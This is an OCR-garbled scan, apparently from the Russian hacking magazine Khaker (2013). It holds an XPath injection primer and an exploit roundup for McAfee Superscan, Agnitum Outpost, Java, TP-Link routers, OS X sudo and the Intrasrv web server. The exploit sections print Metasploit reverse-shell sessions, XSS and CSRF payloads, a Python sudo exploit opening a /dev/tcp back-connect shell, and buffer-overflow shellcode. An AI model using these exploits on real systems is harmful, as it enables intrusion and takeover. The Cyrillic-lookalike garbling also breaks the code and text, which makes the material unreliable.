$меЬ1оді с. соттоп. іпіегпаі , РаскадеіпТо. . .1. . тпадогі, х тіпогіх . гоі ! і пдРаисІИі. . зегѵі се 

Раск^. ^сетрогагуРассЕи. . ітріті иіед.'-. .и. 

1 іііріѵепгіогд. . 1 . . 1 трі ѵегзіогм}.-. . хргс. . . х. ....... зг . . игеЫодІс. г ^ѵт.сіа^БТаЫ еЕптгу/ 

^е. . хрг . ! 



ПРОВЕСТИ ХРАТН-ІМЕСТЮИ 



РЕШЕНИЕ 

Ну и напоследок сегодня немножко классического ѴѴеЬ’а. Мы поговорим 
о такой странной, но, несомненно, важной штуке, как ХРаіН-инъекции. Зна- 
ния о них лягут в несколько тем следующих номеров. Но для начала нам надо 
вспомнить про такую вещь, какХМЦ ибоХРаіГі на ней полностью повязана. 

ХМ1_ — это такое древообразное структурированное представление дан- 
ных. Фича его в большой гибкости, так как разметка не фиксируется, а также 
в возможности восприятия и людьми, и программами. Ну или что-то типа того. 
Основные элементы ХМІ_ — это: 

• элемент; 

• атрибут; 

• значение. 

В примере <иехи 5 І 2 е=" 8 " > Боте ѵаіие </Техі:>!ех! — это элемент; зіге — 
атрибут; зоте ѵаіие — - значение. Все, в общем-то, просто и легко. 

Так вот, ХРаіИ — это язык запросов к элементам ХМ Ь-доку мента. ХРаФ при- 
зван реализовать навигацию по ООМ вХМ1_. Это говорит нам вики. И как верно 
там также сказано, хми можно сравнить с файловой системой, а ХРаФ — это 
путь до конкретных файлов. 

С помощью ХРаФ можно в самом простом виде передвигаться по ХМ 1 _- 
дереву и выбирать какие-то его ветви или элементы. Если же углубиться 
в него, то можно найти возможности по глубокому и точному поиску. Для луч- 
шего понимания легче всего привести парочку примеров. 

Итак, мы имеем ХМІ_-документ — см. рисунок. ХРаФ-запросы: 

1 . /ЬоокзФге/Ьоок/іШе даст нам доступ ко всем элементам ІШе. 

2 . /ДШе сделает аналогичное, но в данном случае мы указываем не прямой 
полный путь, а относительный. ХРаФ сам найдет все элементы ШІе. 

3. /ЬоокзІоге/Ьоок[рпсе>35]/ргісе выберет все элементы с ценой больше 35, 

4. //*[соипі(аиФог)>1] — а здесь мы делаем выборку, только с количеством 
авторов больше 1 . 

5. /Ьоокз!оге/Ьоок[1 ]/уеаг/!оІІоѵѵіпд::* выдаст нам выборку по оси, то есть все 
элементы, что идут после элемента уеаг. 

6 . /Ьоокз1оге/Ьоокрпсе>35 (/ | //*[соипі(аиФог)>1] — совмещаем, выбираем 
по цене и количеству авторов. 

7. /Ді!Іе[$Фпд-ІепдФ{пате()} > 10] — с длинным названием. 



саІедогу="СООКШС"> 
1апд="еп’ , >Еѵегус1ау КаІіап</іі!І< 
ог>Сіасіа йѳ каигепйІ5</аи1:йог> 
>2005</уеаг> 

2>30.00</ргісе> 



Пример ХМЬ- документа 

Консолидирую сказанное. Мы имеем возможность манипулировать пере- 
движениями по дереву, выполнять логические и арифметические операции, 
а также манипуляции со строками. Побольше с примерами ХРаФ можно по- 
знакомиться здесь; поо.аІ/ѵ ЗѴ кІУа (совково, но показательно :)). 

Так вот, теперь мы напрямую подошли к инъекциям, Обыденный пример: 
ломаем мы, предположим, какой-то веб-портал. А у него информация хранит- 
ся вХМІ-файлах, и для поиска по ним сервер использует ХРаФ. Тут мы и «под- 
совываем свою кавычку», чтобы фактически внедриться в процесс поиска. 

Сразу сделаю несколько важных ремарок. Во-первых, ХРаФ очень по- 
хожи на 301-инъекции. То есть нам также нужно вырваться за строку в само 
ХРаФ-выражение. И делается это во многом как раз за счет использования 
кавычек. Во-вторых, сама эксплуатация опять-таки аналогична во многом 
501-инъекциям. Есть обычные, есть на основе ошибок, есть слепые. Техники 
по сути те же, только функции несколько другие. В-третьих, главная проблема 
ХРаФ 1 .0 (для атакующего) в его ограниченности. В отличие от 301 здесь нет 
продвинутых возможностей (взаимодействовать с ОС, например). Фактиче- 
ски чаще всего все, что мы можем, — это полностью слить все данные изХМІ- 
файла, к которому применяется ХРаФ. Да, мы даже не можем выйти за его 
пределы. Грустно, конечно, но подожди до следующего номера и увидишь ряд 
прелестей даже в таких ситуациях. 

Если есть пожелания по разделу Базу Наск или жаждешь поресерчить — 
пиши на ящик. Всегда рад :}. И успешных познаний нового! ЗС 






ХАКЕР 10/177/ 2013 



\ѴАКЫШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ии редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 




Борис Рютин, ЦОР (Езаде ЬаЬ) 

ОикеЬагтап@хакер.ги . 

@сІикеЬагтап 



В этом выпуске мы разберем 
О-бау-уязвимость в нашей люби- 
мой иаѵа, получим права админи- 
стратора в «непробиваемой» 08 X 
и рассмотрим несколько критиче- 
ских ошибок, которые с успехом 
можно проэксплуатировать, в попу- 
лярных продуктах. 







ХЗЗ-УЯЗВИМОСТЬ В МСАРЕЕ ЗУРЕРЗСАЫ 4.0 



ТАНСЕТ8 

МсА^ее Зирегзсап 4.0. 



СѴ55ѵ2: 


ІЧ/А 


Дата релиза: 


8 августа 2013 года 


Автор: 


Ріоіг Оизгупзкі ©сігкіѵѵі (Тгизіѵѵаѵе 5рісІегІ_аЬз) 


СѴЕ: 


2013-4884 



бирегзсап 4 — это ѴѴіпсІоѵѵз -утилита от МсАІее для сканирования портов, 
которую можно использовать как сканер ТСР-портов, пингатор и ответчик. 
Программа содержит ошибку, позволяющую провести обратимую Х55-атаку, 
Из-за того что приложение недостаточно корректно обрабатывает вводимые 
параметры, возможно вернуть пользователю отчет сканера с «необычным» 
ответом, который выполнит произвольный код в браузере. Кстати, есть один 
нюанс: произвольный код передается в кодировке ІІТР-7. 

ЕХРЮІТ 

Пример атакующего запроса с возможностью вставки своего кода: 

+Абы-іт§ 5 пс— х опеггог- 'а зе’Е’Ьег-аІегІ: . а="ЦТР-7-Х55 " ; '+ АР4- 

Как это выглядит на экране, можно посмотреть на скриншоте «Х$$- 
уязвимость в МсАІее Зирегзсап 4.0». Процесс эксплуатации можно автома- 
тизировать с помощью программы РоПзроо? ( Ьі1.Іѵ/17Ѵк223 ) от автора уязви- 
мости. 



ЗОШТІОЯ 

Есть исправление от производителя, 



Ие ЕсЫ Ѵі#ѵу Нійогу Вооктагк? Ісоі? Неір 

С X ГМ:///С:/Сщеитмя$ вп4 5А(іпд»/А(Ітіпі5І;гаі№/0вскЕор/тврал.^кпііІ 

• МмЬѴ'іЛесІ ф ЗДіФвй ШМ&НвЖЙПН ЗифДОйгіЗДі |/ ѴѴеЬ 5Ісв СвІІсіу 
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ХЗЗ-уязвимость в МсАТее Зирегзсап 4.0 
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Обзор эксплойтов 




ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В АСІШМ 
01ЛР08Т ЗЕСІІРІТУ $ШТЕ 8.1 



СѴ55ѵ2: 

Дата релиза: 
Автор: 

СѴЕ: 



ІЧ/А 

2 августа 2013 года 
АНтаб МодЫті ака таІІОсаІ: 
Ы/А 



Программа Оиірозі Зесигііу ЗиЛе Рго от компании Ад п Пит содержит уязви- 
мость типа переполнение буфера в драйвере БапсІЬох. Ошибка возни- 
кает при недостаточной проверке переданных параметров для іосіі- команды 
80000208. Это позволяет атакующему локально вызвать переполнение буфе- 
ра, в результате чего мы получим отказ в обслуживании или сможем выпол- 
нить произвольный код. 

ЕХРДОІТ 

Для начала скачаем исходники эксплойта с сайта автора ( ЬіМу/14г2уаР ). 
Если сайт будет недоступен, то попробуй найти их в базе эксплойтов ( Ьіі. 
Іѵ/1 • ВГ -і ■ ). Эксплойт состоит из двух частей: 

• ехріоіі . срр — код самого эксплойта; 

• х.сііі — 01_1_-библиотека, которая запускает процесс сшсі.ехе с правами 
администратора. 



Исходники компилируются с помощью Ьаі-файла таке.Ьаі или вручную 
{для примера возьмем компилятор сі из ѴізиаІ ЗІиРіо): 

сі /Ю х.срр 
сі ехріоіі; срр 

После чего из-под непривилегированного пользователя необходимо за- 
пусти стить следующие команды: 



. ’ шттшп 


» 

4 

3 * 


■ і ' 


і ■ м ■ “ 


* 11 @@@@@ Ч , 1 т 


И . 










"--'•ІИ 






@ *. 




@ 




@@ > 


■ 


@@ 


' ,т 


@ ; 


( з с 


) /1 / Меіазріоііі \ 


;е'. _ 


* М-- \ / 






■ “[ пеіазрѴои ѵ4. 

+ -- - -=[ 1152 ехр1о1І5 


8 * 0- сЗбѵ [соге:4*8 врі * 1 * 0 ] 

- 639 аихіііагу - 182 ро^і 


+ -- - -=[ 310 рэуІоасІ5 - 


30 епсосіег5 - 8 пор5 


П5^> ехрІоіі/ріііІІІ/Ьго^зег/іаѵа ^Іогеіпааеаггаѵ 


ехрІоіК 


) > Ееі рауіоасі заѵа/5Ье11._геѵег5е_ , Сср 


рауіоасі => ^аѵа/ 5Ье11_геѵег5е_1ср 


П5^ ехрІоіК 


) > зеі ІН05Т 192.168.141.1 


ЬНО^Т => 192 . 168 * 141 - 1 


П5І ехріоіі^ 


) > 5е1 ЯѴЗНОТ 192.168.141.1 


ВѴ5Н0Т => 192 . 168 - 141 * 1 


П5І ехріоіі^ 


) > 5еі УЙІРАСН / 


ьрірасн => / 


п 5^ ехрІоИС 


) > ехр1оіі| 



Пример эксплуатации уязвимости в функции 8іогеІтадеАггау() 



гіаіаР = (ип5І5пе<1 сИаг 

^еіР^ітіііѵеА^^ауС^іііса1(епѵ^ га5іегР^> ]<1а1а л ШЬиХі 
іт (сІаіаР == N11 И) гетигп 0 ■ 



С: \>8е§5ѵг32.ехе /в СіАРго^гаш Рі1е5\а§пііит\Оиіро5і Зесигіі у *-> 
5иііе Рго\. . \. . Ѵ*_. \х_, сііі 
С:\ >ехр1оіі . ехе 

ТАНСЕТЗ 

Адпііит Оиірозі Зесигйу ЗиЛе <8.1. 

50ШТІ0Ы 

На момент написания статьи патча не было. 

МѴА 5Т0РЕІМАСЕАРКАѴ0 — НЕПРАВИЛЬНОЕ 
ИНДЕКСИРОВАНИЕ МАССИВА 

СѴЗЗѵ2: Ы/А 

Дата релиза: 11 августа 2013 года 

Автор: Ыате ѴѴ№ИеІсі (Раскеі Зіогт) 

СѴЕ: 2013-2465 

И снова уязвимость нулевого дня 8 Заѵа. Правда, ее опубликовали на доволь- 
но популярном сайте, посвященном И Б, — РаскеІЗІогт, а не как обычно по- 
сле массового использования в эксплойт-паках. 

Уязвимость неправильного индексирования находится внутри натив- 
ной функции 5ІогеІтадеАггау() библиотеки зге/Ьіп/амі.сІІІ (исходный код 
можно найти по следующему пути: \;ісік\5гс\5Наге\паііѵе\5ип\амі\іта§е\ 
аыірагзеітаёе . с ) : 

5іаііс іп і: 5іогеІта§еАггау(ЗМІЕпѵ *епѵ, Ви-Ріта§е5_і *бгсР л <-■ 
Ви-Ріта2е5_і *сІ5іР, т1іЬ_іта§е *тПЫтР) 

{ 

іпі: тЗігісІе; 

ипЕІапесІ сИаг *стРаіаР. *с!аіаР., *с0аіаР; 

НіпіБ і *іііпіР - &сІ5іР->Ьіпі5 ; 

Ка5іег5_і * газ іегР = &сІ5іР->га5і ег; 

іпі У, 



(КіпіР->раскіп§ == ВѴТЕІМТЕКІ.ЕАѴЕ0) { 



стРаіаР - (ипзі^песі с И а г *) т1іЬ_Іта%е6еіРаіа<-і 
(тІіЬІтР); 

тБігісІе - т1іЬ_Іта§еСеі5ігісІе(т1іЬІтР) ; 



сРаіаР = сІаіаР + ЬіпіР-хіаіаОЕ'Раеі: 

іог (у =Ѳ : у < га5іегР->Иеі§Ні; 

у++ л стРаіаР += тБігісІе, сРаіаР += +-* 
ЬіпіР-> 5 БігісІе) 

{ 

тетсру(сРаіаР, стпРаІіаР газіегР- ><-> 

ыісІіН*НіпіР->питСНап5) ; 

} 

} 

Ш * Ш 

I 

Указатель сІаіаР берется из поля сіаіа Заѵа-объекта гип.аиі. іта§е. 
ВуіеРаскесІРазІіег. В свою очередь, значение ЬіпіР-хІаІіаО-р-ЕзеІ: — из поля 
сІаіаВііО-Р-РьеІ:. 

Напрямую ВуІеРаскесІНаеІег недоступен, но можно к нему обра- 
титься, создав с помощью публичного метода іаѵа.аѵѵгІ:.іпгга§е.Ка5І:ег. 
сгеаіеІлІгііаЫека5І;ег{ ): 

* * ■ 

риЬІіс зіаііс кІгііаЬІеКавіег сгеаіеЫгііаЫеКа5іег( 

БашрІеМосІеІ зт л 
РаІіаВиЕ-Рег сIЬ ^ 

Роіпі; 1осаі:іоп 

); 

Структура вызова этой функции и следующих представлены на сайте 
Огасіе в разделе с официальной документацией ( о і ! I у/1 ЗоІір Еи ) . 

Первый параметр функции сгезі:еЫгіі:аЫека5і:ег( ) — это 

Іаѵа.амі: .1та§е.5атр1еМос!е1. Простая модель Заѵа.амі: . іпа§е. 

Ми1ііРіхе1РаскесІ5атр1еМосІе1 нужна, чтобы создать ВуіеРаскесІкагігег. 
Сама же функция вызывается со следующими параметрами: 



риЬІіс Ми1ііРіхе1РаскесІ5атр_1еМосІе1( 
іпі с}а1:а1уре л 
іпі 

іпі И , 

іпі питЬе^0^ : Віі5 ^ 

іпі 5сап1іпе5ігі(1е л 

іпі сІаіаВііО^-Гаеі 

); 
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МиІііРіхеІРаскегіЗатрІеМосіеІ принимает параметр сіаіаВітО-Е^зеі 
без каких-либо проверок. Конструктор ВуіеРаскесІКазТегО вычисляет зна- 
чение сІаТгаВіігО-Р-Рзеі:, основанное на параметрах ЗатрІеМосіеІ и ОаіаВі^Тег. 
Рассмотрим исходник этой функции в файле \;)сІк\5гс\5Ьаге\с1а55е5\5ип\ 
аѵЛ\іта§е\Вуі:еРаскесІКэ5іег , заѵа; 



і-р ( Ь еі^М: > 1) { 

1351611 = місІІЬ * ріхеІВіІЗІгісіе - 1: 

±і ( І35ІЫ1 / 8 >- 5сап1іпе31гісІе) { 

іЬгом пеіѵ КаБІегРоптаІЕхсерІіоп+гі 

("сіаіа Рог айзасепі" + " зсапНпез оѵегіарз"); 

} 



іЬІіс ВуіеРаскесІКа5іег(5атр1еМоЬе1 ЗатрІеМосіеІ, 

РаіаВи-Ріег сІаіаВиІіег,, 

Кесіап§1е аКе§іоп л 
Роіпі огі§іп л 
Ву1еРаскесІРа5Іег рагеп!){ 

5ирег.(5атр1еМосІе1 л Ьа1аВи1Тег л аКе&іоп л огі§іп , рагепіХ; 

і а іб . тахХ - тіпХ + місІІМз 

1І1І5 . тахУ _ тіпѴ _+_ Ьеі^Ыз 

! (сІаіаВи-РТег іпзіапсеоіі ОаіаВиТТегВуіе) ) { 

іЬгоіл; пеш КазіегРогтаіЕхсерііопе 

( "ВуіеРаскесІКазіегз тизі Ьаѵе" + 

"Ьуіе ОаіаВиТ-Регз" ) ; 



ОаІаВи-Р-РегВуІе сІЬЬ = (ОаіаВи-РІегВуіе)сІаіаВи-Р-Рег; 

іЬіз.сІаіа = 5іеаЮаіа(сІЬЬ., 0); 

іГ (ЬЬЬ.§еіМитВапк5( ) != 1) { 

16 гом пем 

Ка5ІегРогта1Ехсер1іоп("0а1аВи-р-Рег -Рог <-■ 
ВуіеРаскесЖазіегз" + " тиаі опіу Ьаѵе 1 Ьапк."); 

} 

іпі сІЬ0-РІ5е1 = сІЬЬ . ^еЮ-р-Р зе! О * 

і г_ (затрІеМосіеІ іпБіапееоі МиІііРіхеІРаскесІЗатрІеМосІеІІ { 

МиІііРіхеІРаскесІЗатрІеМогіеІ тррзт = 

(Ми1ііРіхе1РаскебЗатр1еМосіе1)5атр1еМосіе^ 

ІМа. іуре - Іп1е§егСотропеп1Ка5Іег 

ТУРЕВѴТ Е_В I МАВУ_5АМРІ_ Е 5.; 

ріхеІВііЗігібе = трр5т.§еіРіхе1ВііЗігісІе( Хі 

і-р (ріхеІВіІЗІгісіе і = 1 && 

ріхеІВіІЗІгісіе 1= 2 && 
ріхеІВіІЗІгісіе 1= 4) { 

16 гоы пеы КазІегРогтаІЕхсерІірп 

(ІВуіеРаскесІКазіегз тизі Ьаѵе а Ы1 сІеріЬ <-> 

о -р 1. 2, ог 4”Ѵ: 

1 

зсапІіпеЗігісіе = трр5т.§еіЗсап1іпеЗігісІе( ) ; 

сІа1аВі10-р-р5е1 = трр5т.§е10а1аВі10-р-р5е1() + «-■ 
сІЬ0-рі5еі*8; 

іпі хОІ-РзеІ = аВе§іоп.х - огі§іп.х; 
іпі уОНзеі = аКе§іоп.у - огіёіп.у; 

еІаІаВіЮ-р-Рзе! +== хО-р-р5е1*ріхеІВі131гіс1е + <-■ 

уО-р-р5е1*5сап1іпе51гісІе*8з 

ЬііМазк = ( 1 << ріхеІВіІЗІгісіе) -1: 

зЫІіО-Р-Рзеі = 8 ріхеІВіІЗІгісіе; 



іЬгом пеы Ра5ІегРогта1Ехсер1іоп( "ВуІеРаскесІВаБіегз +-■ 

ти5і Ьаѵе"^ь '’Ми1ііРіxе1Раскесі5атр1еМосIе1 ,, )_; 

} 

ѵегі-ру (-РаІ5е) : 

} 



А попытка проверки параметра гіаіавііо-РРБеІ осуществляется с помо- 
щью следующего кода: 

ргіѵаіе ѵоіЬ ѵегі-ру (Ьооіеап зігісіСЬеск) { 



В итоге если ты не видишь многократное переполнение целого числа 
со знаком внутри функций ВуіеРаскесІКазіегО и ѵегі1у() или если не зна- 
ешь, как использовать целочисленное переполнение, то в данном случае 
ѵегі-ру () позволяет тебе установить сІаіаВііО-Р-Рзеі почти в восемь раз боль- 
ше, чем сіаіа. 1еп§1Ь. Поэтому сІаіаВііО-Р-Рзеі можно указать вне массива 
сіаіа, а этого будет достаточно для повреждения памяти внутри родной функ- 
ции 5іогеІта§еАггау( ). 

Обычно повреждение памяти не случается с ВуіеРаскегіКаьіег благо- 
даря условию і-Р (Ьіп1Р->раскіп§ == 8УТЕ_ІМТЕКІ.ЕАѴЕР) внутри функции 
5ІогеІтадеАггау( ). К счастью, это можно обойти, если форсированно пере- 
дать Заѵа на обработку байты, упакованные как перемежающиеся растры, ис- 
пользуя объект СоІогМосІеІ. Для лучшего понимания скачай исходники с сай- 
та раскеШогпл ( Ь№.Іу/178ЕМ6о ). 



ЕХРДОІТ 

Эксплойт существует в двух видах: 

• НТМ 1-страница (опубликован на сайте раскеіБіогт ) ; 

* модуль для Меіазріоіі 

Эксплойт от раскеізіогт успешно работает в ѴѴіпсІоѵѵз и 08 X системах. 
Если в случае с ѴѴіпсІоѵѵз все привычно, то тебя должен заинтересовать не- 
большой кусок кода, который будет работать в обеих системах и пригодится 
для наших с тобой РоС: 

ргіѵаіе Ьооіеап _І5Мас _= 5у5Іет.§е1Ргорег1ѵ( "05 . пате" 

сопІаіпБ ( "Мае " ) : 

< * ■ 

і-р (5ѵ5Іет, деІЗесигіІѵМапа^егП =- пиіі) { 

Кипііте..ёеіКип1іггіе( )^_ехес(_ ізМас ? ''/Ар рІіс а ііопБ/*-» 
Са1си1аіог,арр/Сопіепі5/Мас05/Са1си1аіог , ’ : "саіс . ехе" ) ; 

} 



Правда, есть небольшой нюанс: если эксплойт будет запущен в І_іпих, 

то он попытается работать как в ѴѴіпсІоѵѵз. 

Из консоли Меіазріоіі эксплуатация выглядит следующим образом: 

тзіпізе ехр1оіі/ти1іі/Ьгом5ег/]аѵа_5іогеІта§еАггау_«-‘ 
Іпѵа1ісІ_Аггау_ІпсІехіпё 

тз-Р ех р1оі1(іаѵа_5іогеІтаееАггау _Іпѵа1іс І_Аггау _Іп с1ехіпе) > 

5ѲІ 5КѴН05Т 192.168.23.70 

т5І ехр1оіі( заѵа_5іогеІта§еАггау_Іпѵа1ісІ_Аггау_ІпсІехіп§) > *-■ 
зеі иКІРАТН / 

ГП5І ехр1оіі( ]аѵа_5іогеІта§еАггау_Іпѵа1ісІ_Аггау_ІпсІехіп§) 
зеі РАУЮАО ]аѵа/те1егрге1ег/геѵег5е_1ср 

ітз-р ехр1оіі( іаѵа_5ІогеІта§еАггау Іпѵа1ісІ_Аггау_ІпсІехіп§) > *-> 
зеі І.Н05Т 1 92.168.23.70 

ГП5-Р ехр1оі1(заѵа_5ІогеІта§ еА ггаѵ Іпѵаіісі Аггау Іпсіехі п^ ^ 
ехріоіі 

ТАНСЕТЗ 

Оаѵа < 7и25, 

50ШТІ0Ы 

Есть исправление от производителя. 



і г (сІаіаВііОіізеі < 0) { 

ІЬгом пем К азіегРогтаіЕхсерііопС "Раіа о-Р-Рзе із ти5і <-■ 
Ье >= 01); 

4 

іпі І аБіЬіі = (баіаВі10-р-р5еі 

+ (Ьеі§Ы-1) * зсапІіпеЗігісІе * 8 
+ (міЫЬ- 1^ * ріхеІВіІЗІгісіе 

^ріхеІВіІЗІгісіе - 1 ) ; 

і-р (ІазіЬіі / 8 >= сіаіа ,,1еп§іЬ) { 

ІЬгом пем РазіегРогтаіЕхсерііоп( "газіег сіітепзіопз <-> 
оѵегРІом " + "аггау Ьоипсіз"); 

} 

гр (зігісіСЬеск) { 



МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 

в тр-иик то-швіио 

СѴ55ѵ2: Ы/А 

Дата релиза: 3 сентября 2013 года 

Автор: хізіепсе 

СѴЕ: ІЧ/А 

Продолжим тему различных уязвимостей в роутерах. Очередной жертвой ста- 
ло устройство от компании ТР-Упк. Несколько Х55- и одна С5ПР-уязвимость. 
Перейдем сразу к их эксплуатированию. 
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ЕХРДОІТ 

Первая — отраженная Х55-уязвимость для неавторизованных пользователей 
в поле Яеіегег при обращении к несуществующим ІІНІ_-адресам на роутере. 
Пример запроса: 

СЕТ /боезпобехізб НТТР/1.1 
Нозб: 192.168.1.1 

Кебегег : Ьббр : //рміеб"><5сгірб>а1егб( "Х55" )</5сгірб> 
Соппесбіоп: кеер^аііѵе 

Вторая — тоже отраженная Х55-уязвимость, но уже для авторизованных. 
Она нашлась в различных аргументах ѴѴі-Рі-сети, поддерживаемой устрой- 
ством. Ниже представлены примеры для сети с именем Ріоте_ы1ап_1: 

Ьб бр: //<ІР>/Рорт5/Мот е _м1ап_1?ы1апІА[ЕВР1а§=%ЗС 5сгі р1:%З Е а1ег1:^ 

%28%22Х55%22%29%ЗС/зсгірб%ЗЕ 

Ьббр: //<ІР>/Рогтз/І'іоте_ц1ап_1?Ассе55Р1аЕг=%ЗС5сгірб%ЗЕа1егб% < -‘ 
28%22Х55%22%29%ЗС/5СГІрб%ЗЕ 

ИТТр: //<ІР>/Рогш5/ Ріоте_ы1 ап_1? ы1ап_АРепаЫе=%З С5СГІ рТ%ЗЕа 1егТ<-і 
%28%22Х55%22%29%ЗС/5СГІрб%ЗЕ 

Следующая уязвимость также доступна только для авторизованных поль- 
зователей, но уже в одной из диагностических команд — ріпд — на странице 
/Рогш5/і:ооІ5_Те5і:_1 в аргументе Ріп§ІРАсІгіг. Пример запроса: 

Р05Т /Ропп5/бооІ5_бе5б_1 НТТР/1.1 

Нозб: <ІР> 

Кебегег : И бб р: //<ІР> /таіпбепапсе/боо1з_безб . Іібт 

АибНогігабіоп : Вазіс ЫаЫаЫа== 

Соппесбіоп: кеер-аііѵе 

Сопбепб-Туреі арріісабіоп/х-ѵмм-богт-игіепсобеб 
Сопбепб- беп§бРі : 164 

Те5Т_РѴС=РѴС0&Ріп8ІРАбсІг=%ЗС%2РТехТагеа%ЗЕ%ЗС5СГІрТ%ЗЕа1егі:%^ 
28%22ХБ5%22%29%ЗС%2Рзсгірб%ЗЕ&ріпё;Па8=1&бгасе_ореп а§=0&1 п-Ро*^ 
РІ5р1а у=Р іп§тгедие5б+сои1б+поб-Иіпб+Но5Іі+ 

Что касается С5ПР-уязвимости, то она позволяет сбросить пароль адми- 
нистратора. Для атаки нужно создать НТМІ- страницу, которая отправит сле- 
дующий запрос: 

Ьббр : //<ІР>/Рогтз/ТооІ5_асІтіп_1? иіѴіемТооІ5_Ра55мопсІ=<-' 
РЫМЕ0&иіѴіеыТооІ5_Ра5 5ИОГСІСопйгт=РЫМЕ0 

Чаще всего устройства этой компании имеют ІР-адрес 192.168.1 .1. Далее 
злоумышленник завлекает администратора устройства на его атакующую 
страницу. После чего паролем станет слово РЫ1МЕ0. Примеры атакующих стра- 
нице использованием из мы рассматривали в предыдущих номерах журнала. 

ТАПСЕТЗ 

Протестировано на ТР-Ыпк ТО-ѴѴ8951МЭ Рігтѵѵаге 4.0.0 ВиіІсІ 120607 
РеІ. 30923. 

80ДОТІ0Ы 

Ответа от производителя не поступало. 

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В 03 X 

СѴ55ѵ2: 6.9 ( АѴ: 1/АС: М/Ац: N/0:0/1 :С/А: С) 

Дата релиза: 29 августа 2013 года 

Автор: Магсо ЗсІіоерІ, Оаѵіб Кеппебу (Пебі К) 

СѴЕ: 2013-1775 

Утилита зибо содержит уязвимость, благодаря которой атакующий может ма- 
нипулировать системными часами и обходить ограничения администратора. 
Эта ошибка возникает в случае, когда батарея в системе полностью разря- 
жена или атакующий запускает команду с аргументом ’-к' для сброса метки 
времени. Так как ОЗ X является, по сути, *піх-системой, то и она использует 
зибо для выполнения системных команд. Для примера, ОЗ X 10.8.2 исполь- 
зует версию зибо 1.7.4р6. Асам эксплойт тестировался на ОЗХ 10.7-10.8.4. 

ЕХРДОІТ 

Для успешного срабатывания эксплойт должен запускаться с правами поль- 
зователя, который есть в списке зибо, либо пользователя, который входит 
в группу асітіп §поир. Теперь рассмотрим сам эксплойт, запускающий шелл 
на порту 4444: 



ітрогб зиЬргосезз 

# ІР- адрес для бэк-коннекта 

іраббг = "192.168.1.1" 

# Порт 

рОГб = ” 4444 м 

# Открываем шелл с правами администратора через установку 

# времени 

рго с = зиЬргосезз. Рореп ( 1 Ьаз Н 1 . з Ие11=РаІ5е . <-■ 

5ббоиб=зиЬргосез5 .РІРЕ . 5ббіп= зиЬргосез5.РІР Е. <-■ 

зббегг=зиЬргосезз . РІРЕ) 

ргос . зббіп .ыгібе( "Бузбетзебир -5ебиБІп§пебиогкбіте Обб 

^Беббітегопе <5МТ -Беббабе 01 :01:1970 -Беббіте 00:„00;зибо ^ 

зи\пЬа5Іі -і >& /беѵ/бср/%5/%5 0>&1 &\п" % (іраббг л рогб) ) 

Как видишь, мы отключаем опцию «Использовать сетевое время», чтобы 
дата не вернулась, и переводим время в «начало эпохи» УЫІХ — 1 января 1970 
года. Далее вызываем команду переключения пользователя на админа — зи 
через зибо и открываем порт для бэк-коннекта. 

Помимо ОЗ X, эксплойт можно попробовать и в других ОС семейства *піх. 
Для того чтобы узнать версию зибо, достаточно ввести 

$ зибо -ѵ 

Такая же проверка реализуется в модуле для Меіазріоіі под эту уяз- 
вимость, Кстати, его и использовали при создании РуІЬоп-скрипта (эіі 
У/ 1. еіу ох/ ), рассмотренного выше. 

ТАНСЕТ5 

# Зибо 1. 6.0-1 .7. Юрб; 

# Зибо 1 .8.0-1 .8. брб. 

50 ДОПОИ 

Есть патч как от разработчиков утилиты зибо, так и для ОЗ X. 

УДАЛЕННОЕ ПЕРЕПОЛНЕНИЕ БУФЕРА 
В ВЕБ-СЕРВЕРЕ ІИТКА5РѴ 

СѴ55ѵ2: Ы/А 

Дата релиза: 30 мая 2013 года 

Автор: хіз опе 

СѴЕ: Ы/А 

Іпігазгѵ — небольшой консольный веб-сервер для ѴѴіпбоѵѵз, Ошибка возни- 
кает из-за недостаточной проверки входящих НТТР-запросов от пользовате- 
лей. Это позволяет с помощью специально созданного запроса выполнить 
произвольный код на атакуемом компьютере. 

ЕХРДОІТ 

Рассмотрим эксплойт ( ЬіІ.Іѵ/ІбІ-ІРМзН І: 

её§Иипбег=" \х66\х81_\хса\х1 ! б\х0б\х42\х52\х6а\х02\х58\хсб\х2е\^ 
хЗсХхѲБХхВаХхУАХхе-РХхЬВХхБАХхЗѲХхЗѲХхБТХхвѲХхбТХхаРХхУБХхеа V- 
ха-Е\х75\хе7\х’Н : \хе7" + ’'\х90"*94 
п5еИ="\хЕВ\х80\х90\х90” # Пе реход к е^Ьипбег 
5еИ="\хбб\х97\х40\х00" #_Вернуться на процесс ігг Егазгѵ.ехе 
сгазЬ = ”\х90"*1427 + ед^ Ьипбег + пзеЬ + 5еІі + ”\ х9Ѳ "*2439 

# наш шелл -код 

5Ііе11собе= ("ТѲѲІлГГѲѲІлГ + И \х89\хе2\хба\хсР\хб9\х72\х-Р4 . .. 

Ьы-р-Гег="бЕТ / НТТР/1.1\г\п" 

Ьиб1 : ег+="Н05б : " + сгазб + "\г\п" 

Ьи-Е-Еег+="Сопбепб-Туре : арр1ісабіоп/x-^л^Iм-■^ : о^т-и^1епсосIеб\^\п' , 
Ьи-Е-Рег+=зІіе11собе 

опе = Боскеб.зоске б ( воскеб.А РЦЧЕТ. Боскеб . 50СК_5ТКЕАМ_) 

опе. соппесб( (баг^еб, 80)) 

опе. зепб(Ьиббег) 

опе. с1озе( ) 

Как видишь, наш «полезный» код с ошибочными данными передается в па- 
раметре НТТР-запроса — Мозб Помимо этого, в эксплойте применяется техника 
едд бипбіпд. Подробнее о ней можно узнать на сайте исследователя согеіап { Ыб. 
Іѵ/17ѵѵш ). Такая техника используется, когда у нас небольшой размер буфера. 

Также есть модуль для нашего любимого фреймворка Меіазріоіі, пример 
работы представлен на скриншоте «Пример эксплуатации уязвимости в веб- 
сервере Іпігазгѵ с помощью Меіазріоіі- модуля». 




Взлом 
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Раг Мапа^ег, ѵегзіоп 3.0 (Ьиіісі 3367) х64 

Соругі§Ні © 1996-2000 Еи§епе НозИаІ, Соругі§М: © 2000-2013 Раг Сгоир 

С : \и5ег5\гоо^\0оѵлі1оасІ5\іп1га5гѵ>іп*гз5гѵ.ехе 
ИАКМШС: Рігесѣогу С:\аИагес1 сіоез поі: ехіз^. 

КосЬ : С : \ г есі 

ІР А<ісІ г Іеѵеі таІгсНіпе: 3 

Н05І Мате : зЕас 

АсІгігезБ Туре: 2 

АгісІге55 І_егѵ§11і: 4 

